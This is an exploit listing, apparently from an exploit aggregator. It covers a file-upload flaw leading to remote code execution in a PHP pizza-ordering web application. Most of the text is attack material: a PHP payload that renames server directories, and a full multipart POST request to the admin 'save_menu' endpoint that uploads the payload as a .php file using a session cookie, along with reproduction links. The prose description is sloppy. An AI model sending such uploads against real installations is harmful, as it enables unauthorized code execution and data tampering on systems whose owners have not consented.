Share
## https://sploitus.com/exploit?id=PACKETSTORM:171662
## Title: Online-Pizza-Ordering-1.0 File-Inclusion-RCE  
## Author: nu11secur1ty  
## Date: 03.30.2023  
## Vendor: https://github.com/oretnom23  
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html  
## Reference: https://portswigger.net/web-security/file-upload  
  
## Description:  
The malicious user can request an account from the administrator of  
this system.  
Then he can use this vulnerability to destroy or get access to all  
accounts of this system, even more, worst than ever.  
The malicious user can upload a very dangerous file on this server,  
and he can execute it via shell.  
The status is CRITICAL.  
  
STATUS: HIGH Vulnerability  
  
[+]Exploit:  
```mysql  
<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;  
  
// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;  
  
// using rename() function to rename the file  
rename( $old_name, $new_name) ;  
  
?>  
  
```  
[+]Injection_REQUEST:  
```POST  
POST /php-opos/admin/ajax.php?action=save_menu HTTP/1.1  
Host: pwnedhost7.com  
Content-Length: 1050  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111  
Safari/537.36  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Origin: http://pwnedhost7.com  
Referer: http://pwnedhost7.com/php-opos/admin/index.php?page=menu  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=sn639s6euv91mfc9rbef4tdr1p  
Connection: close  
  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="id"  
  
  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="name"  
  
  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="description"  
  
  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="status"  
  
on  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="category_id"  
  
4  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="price"  
  
  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="img"; filename="namebasterd.php"  
Content-Type: application/octet-stream  
  
<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;  
  
// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;  
  
// using rename() function to rename the file  
rename( $old_name, $new_name) ;  
  
?>  
  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX--  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)  
  
## Proof and Exploit:  
[href](https://streamable.com/szb9qy)  
  
## Time spend:  
00:45:00